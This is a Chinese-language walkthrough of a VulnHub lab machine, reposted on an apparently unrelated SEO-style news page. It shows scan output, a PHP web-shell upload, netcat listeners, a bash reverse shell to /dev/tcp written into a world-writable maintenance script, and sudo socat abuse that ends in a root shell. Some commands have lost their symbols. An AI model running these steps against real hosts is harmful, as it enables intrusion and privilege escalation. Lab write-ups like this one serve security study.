当前位置：首页 > news >正文

网站备案非经营江苏seo和网络推广

news 2025/11/15 4:05:22

网站备案非经营,江苏seo和网络推广,外贸网站推广与优化,百度开户流程目录信息收集 arp nmap nikto whatweb WEB 信息收集 dirmap 文件上传提权系统信息收集横向提权信息泄露 get root 信息收集 arp ┌──(root㉿ru)-[~/kali/vulnhub] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:50:56:2f:dd…目录信息收集 arp nmap nikto whatweb WEB 信息收集 dirmap 文件上传提权系统信息收集横向提权信息泄露 get root 信息收集 arp ┌──(root㉿ru)-[~/kali/vulnhub] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:50:56:2f:dd:99, IPv4: 192.168.211.128 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.211.1 00:50:56:c0:00:08 VMware, Inc. 192.168.211.2 00:50:56:e6:61:4b VMware, Inc. 192.168.211.135 00:50:56:21:cf:ed VMware, Inc. 192.168.211.254 00:50:56:f0:b5:b8 VMware, Inc.4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.495 seconds (102.61 hosts/sec). 4 responded nmap 端口扫描┌──(root㉿ru)-[~/kali/vulnhub] └─# nmap -p- 192.168.211.135 --min-rate 10000 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 13:59 CST Nmap scan report for 192.168.211.135 Host is up (0.0036s latency). Not shown: 65534 closed tcp ports (reset) PORT STATE SERVICE 80/tcp open http MAC Address: 00:50:56:21:CF:ED (VMware)Nmap done: 1 IP address (1 host up) scanned in 8.05 seconds 版本服务探测┌──(root㉿ru)-[~/kali/vulnhub] └─# nmap -sC -sV -O -p 80 192.168.211.135 --min-rate 10000 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 14:00 CST Nmap scan report for 192.168.211.135 Host is up (0.00049s latency).PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Freelancer - Start Bootstrap Theme MAC Address: 00:50:56:21:CF:ED (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hopOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.22 seconds nikto ┌──(root㉿ru)-[~/kali/vulnhub] └─# nikto -h http://192.168.211.135/ - Nikto v2.5.0 ---------------------------------------------------------------------------Target IP: 192.168.211.135Target Hostname: 192.168.211.135Target Port: 80Start Time: 2024-04-08 15:47:27 (GMT8) ---------------------------------------------------------------------------Server: Apache/2.4.38 (Debian)/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/No CGI Directories found (use -C all to force check all possible dirs)Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch./: Server may leak inodes via ETags, header found with file /, inode: 6a7f, size: 5af24a0184072, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?nameCVE-2003-1418OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET ./icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/8102 requests: 0 error(s) and 6 item(s) reported on remote hostEnd Time: 2024-04-08 15:47:53 (GMT8) (26 seconds) ---------------------------------------------------------------------------1 host(s) tested whatweb ┌──(root㉿ru)-[~/kali/vulnhub] └─# whatweb -v http://192.168.211.135/ WhatWeb report for http://192.168.211.135/ Status : 200 OK Title : Freelancer - Start Bootstrap Theme IP : 192.168.211.135 Country : RESERVED, ZZSummary : Apache[2.4.38], Bootstrap, HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], JQuery, Script, X-UA-Compatible[IEedge]Detected Plugins: [ Apache ]The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. Version : 2.4.38 (from HTTP Server Header)Google Dorks: (3)Website : http://httpd.apache.org/[ Bootstrap ]Bootstrap is an open source toolkit for developing with HTML, CSS, and JS. Website : https://getbootstrap.com/[ HTML5 ]HTML version 5, detected by the doctype declaration [ HTTPServer ]HTTP server header string. This plugin also attempts to identify the operating system from the server header. OS : Debian LinuxString : Apache/2.4.38 (Debian) (from server string)[ JQuery ]A fast, concise, JavaScript that simplifies how to traverse HTML documents, handle events, perform animations, and add AJAX. Website : http://jquery.com/[ Script ]This plugin detects instances of script HTML elements and returns the script language/type. [ X-UA-Compatible ]This plugin retrieves the X-UA-Compatible value from the HTTP header and meta http-equiv tag. - More Info: http://msdn.microsoft.com/en-us/library/cc817574.aspx String : IEedgeHTTP Headers:HTTP/1.1 200 OKDate: Mon, 08 Apr 2024 07:33:10 GMTServer: Apache/2.4.38 (Debian)Last-Modified: Sat, 12 Sep 2020 21:38:43 GMTETag: 6a7f-5af24a0184072-gzipAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 3377Connection: closeContent-Type: text/html WEB 信息收集 dirmap ┌──(root㉿ru)-[~/tools/dirscan/dirmap] └─# python3 dirmap.py -i http://192.168.211.135/ -lcf ##### # ##### # # ## ###### # # # # ## ## # # # ## # # # # # ## # # # # ## # # ##### # # ###### ###### # # # # # # # # ###### # # # # # # # # v1.0[*] Initialize targets... [] Load targets from: http://192.168.211.135/ [] Set the number of thread: 30 [] Coroutine mode [] Current target: http://192.168.211.135/ [*] Launching auto check 404 [] Checking with: http://192.168.211.135/ccjimqtouvulxwpfqmepgsutmqaakqkggbqjpmlnko [*] Use recursive scan: No [*] Use dict mode [] Load dict:/root/tools/dirscan/dirmap/data/dict_mode_dict.txt [*] Use crawl mode [200][text/html][3.30kb] http://192.168.211.135/index.html [200][text/markdown][278.00b] http://192.168.211.135/readme.md [200][text/html][588.00b] http://192.168.211.135/upload/ [200][text/html; charsetUTF-8][500.00b] http://192.168.211.135/upload/upload.php [200][text/html][3.30kb] http://192.168.211.135/ [200][application/javascript][906.00b] http://192.168.211.135/js/contact_me.js [200][image/png][18.79kb] http://192.168.211.135/img/portfolio/safe.png [200][image/png][10.04kb] http://192.168.211.135/img/profile.png [200][text/css][4.92kb] http://192.168.211.135/font-awesome/css/font-awesome.min.css [200][application/javascript][32.45kb] http://192.168.211.135/js/jquery.js [200][image/png][23.76kb] http://192.168.211.135/img/portfolio/submarine.png [200][application/javascript][680.00b] http://192.168.211.135/js/classie.js [200][image/png][27.33kb] http://192.168.211.135/img/portfolio/circus.png [200][text/css][1.82kb] http://192.168.211.135/css/freelancer.css [200][image/png][16.67kb] http://192.168.211.135/img/portfolio/cake.png [200][image/png][25.29kb] http://192.168.211.135/img/portfolio/game.png [200][application/javascript][622.00b] http://192.168.211.135/js/freelancer.js [200][text/css][18.91kb] http://192.168.211.135/css/bootstrap.min.css [200][image/png][35.66kb] http://192.168.211.135/img/portfolio/cabin.png [200][application/javascript][9.19kb] http://192.168.211.135/js/bootstrap.min.js 99% (6600 of 6618) |################################################### | Elapsed Time: 0:00:13 ETA: 0:00:00看来就是文件上传了文件上传虽然上传成功了但是不知道上传到哪了我们再次进行目录检索┌──(root㉿ru)-[~/kali/vulnhub] └─# wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt -u http://192.168.211.135/upload/FUZZ -t 100 --hc 404,403 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzzs documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ********************************************************Target: http://192.168.211.135/upload/FUZZ Total requests: 17770 ID Response Lines Word Chars Payload 000000055: 301 9 L 28 W 325 Ch files 000003809: 200 31 L 85 W 903 Ch http://192.168.211.135/upload/ 经过fuzz发现files路径┌──(root?ru)-[~/kali/vulnhub] └─# nc -lvvp 1234 listening on [any] 1234 ... 192.168.211.135: inverse host lookup failed: Unknown host connect to [192.168.211.128] from (UNKNOWN) [192.168.211.135] 60876 Linux 32064e9210cb 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux08:09:12 up 22 min, 0 users, load average: 0.01, 0.87, 0.85 USER TTY FROM LOGIN IDLE JCPU PCPU WHAT uid33(www-data) gid33(www-data) groups33(www-data) $ id uid33(www-data) gid33(www-data) groups33(www-data) $ 提权系统信息收集 $ find / -perm -us -type f 2/dev/null /usr/bin/chsh /usr/bin/chfn /usr/bin/newgrp /usr/bin/passwd /usr/bin/gpasswd /bin/mount /bin/umount /bin/su$ ls -al /var/www/html total 88 drwxr-xr-x 11 root root 4096 Sep 12 2020 . drwxr-xr-x 1 root root 4096 Sep 10 2020 .. drwxrwxrwx 2 root 1000 4096 Apr 8 2024 Maintenance-Web-Docker drwxr-xr-x 2 root root 4096 Sep 12 2020 css drwxr-xr-x 6 root root 4096 Sep 12 2020 font-awesome drwxr-xr-x 2 root root 4096 Sep 12 2020 fonts drwxr-xr-x 3 root root 4096 Sep 12 2020 img -rw-r--r-- 1 root root 27263 Sep 12 2020 index.html drwxr-xr-x 2 root root 4096 Sep 12 2020 js drwxr-xr-x 2 root root 4096 Sep 12 2020 less -rw-r--r-- 1 root root 11336 Sep 12 2020 license drwxr-xr-x 2 root root 4096 Sep 12 2020 mail -rw-r--r-- 1 root root 278 Sep 12 2020 readme.md drwxr-xr-x 3 root root 4096 Sep 12 2020 upload $ ls -al total 24 drwxrwxrwx 2 root 1000 4096 Apr 8 2024 . drwxr-xr-x 11 root root 4096 Sep 12 2020 .. -rwxrwxrwx 1 root root 164 Sep 13 2020 list.sh -rwxr-xr-x 1 root root 204 Sep 12 2020 maintenance.sh -rw-r--r-- 1 1000 1000 5066 Apr 8 08:42 out.txt $ cat list.sh #!/bin/bash date /home/richard/web/Maintenance-Web-Docker/out.txt ls /home/richard/web/upload/files/ | wc -l /home/richard/web/Maintenance-Web-Docker/out.txt $ date Mon Apr 8 08:43:20 UTC 2024这些命令的作用是将当前日期追加到文件 /home/richard/web/Maintenance-Web-Docker/out.txt 中然后统计目录 /home/richard/web/upload/files/ 中文件的数量并将数量追加到同一文件中。list.sh是可读可写可执行的我们利用一下横向提权 echo /bin/bash -c bash -i /dev/tcp/192.168.211.128/7878 01 list.shrichardEC2:~$ ls ls HackTools user.txt web richardEC2:~$ cat user.txt cat user.txt 3a6b99f59ea363803bcafc7f5dd9b1e8 richardEC2:~$ richardEC2:~/HackTools$ sudo -l sudo -l Matching Defaults entries for richard on EC2:env_reset, mail_badpass,secure_path/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser richard may run the following commands on EC2:(ALL) NOPASSWD: /home/richard/HackTools/socat TCP-LISTEN\:8080\,forkTCP\:127.0.0.1\:90 richardEC2:~/HackTools$ /home/richard/HackTools/socat TCP-LISTEN\:8080\,fork TCP\:127.0.0.1\:90我们使用sudo运行果然开放了新的端口信息泄露经过测试存在信息泄露漏洞这个服务是以root权限运行的我们可以执行我们之前上传的payload即可拿到root权限的shell上传路径 /home/richard/web/uplaod/files/shell.phpget root ┌──(root?ru)-[~/tools/dirscan/dirmap] └─# nc -lvvp 2345 listening on [any] 2345 ... 192.168.211.135: inverse host lookup failed: Unknown host connect to [192.168.211.128] from (UNKNOWN) [192.168.211.135] 42992 Linux EC2 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux05:06:55 up 32 min, 0 users, load average: 6.43, 6.14, 4.00 USER TTY FROM LOGIN IDLE JCPU PCPU WHAT uid0(root) gid0(root) groups0(root) sh: 0: cant access tty; job control turned off # id uid0(root) gid0(root) groups0(root) # cd /root # ls proof.txt # cat proof.txt_ _ _ _ _ _ | | | | | | | | | | | | | | | ___| | | __| | ___ _ __ ___| | | |/\| |/ _ \ | | / _ |/ _ \| _ \ / _ \ | \ /\ / __/ | | | (_| | (_) | | | | __/_|\/ \/ \___|_|_| \__,_|\___/|_| |_|\___(_)07f61ca07bc617f9639b412423b2cc6f Twitter: 0x04E1 #

查看全文

http://www.zqtcl.cn/news/59420/